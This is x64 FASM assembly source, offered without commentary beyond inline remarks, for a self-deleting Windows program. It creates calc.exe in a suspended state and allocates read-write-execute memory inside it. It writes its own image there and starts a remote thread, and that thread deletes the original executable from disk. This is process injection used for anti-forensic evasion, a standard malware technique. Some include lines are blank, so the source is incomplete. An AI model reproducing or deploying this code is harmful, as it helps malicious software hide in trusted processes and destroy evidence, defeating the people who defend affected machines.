include '' include '' entry start start: sub rsp, 8 ; Align stack fastcall [GetModuleFileNameA], 0, modulename, 50 ; Get full path of this file mov rax,[gs:60h] ; PEB mov rax,[rax+10h] ; ImageBaseAddress mov [ImageBaseAddress], rax movsxd rax, dword [rax+IMAGE_DOS_HEADER.e_lfanew] add rax,[ImageBaseAddress] mov eax, dword [rax+IMAGE_NT_HEADERS64.OptionalHeader.SizeOfImage] mov [dwSize], eax ; To work for Win10 we must clear the sinfo struct (104 Bytes) cinvoke memset, sinfo, 0, 104d mov [sinfo.cb], 104d ; Now we create the process to inject our code in with CREATE_SUSPENDED flag so it does not actually run :) fastcall [CreateProcessA], 0, sCalc, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, sinfo, pinfo ; Allocate memory in the remote process (Calc.exe) fastcall [VirtualAllocEx], [pinfo.hProcess], [ImageBaseAddress], [dwSize], MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE ; Write it to the remote process fastcall [WriteProcessMemory], [pinfo.hProcess], rax, [ImageBaseAddress], [dwSize], 0 ; execute the code pointed by HijackedThread into the remote process fastcall [CreateRemoteThread], [pinfo.hProcess], 0, 0, HijackedThread, 0, 0, 0 exit: fastcall [ExitProcess], 0 ; exit this process so the injected code can delete this file ! HijackedThread: sub rsp, 8 invoke DeleteFileA, modulename ; <-- modulename contains the full path of this file invoke ExitProcess,0 section '.data' data readable writeable sCalc db 'calc.exe',0 ; <-- process where we inject our code in modulename rb 50 pinfo PROCESS_INFORMATION sinfo STARTUPINFO ImageBaseAddress dq 0 dwSize dd 0 section '.idata' import data readable writeable library kernel32,'KERNEL32.DLL',\ user32,'USER32.DLL',\ msvcrt,'msvcrt.dll' import msvcrt,\ memset,'memset' include 'api\' include 'api\'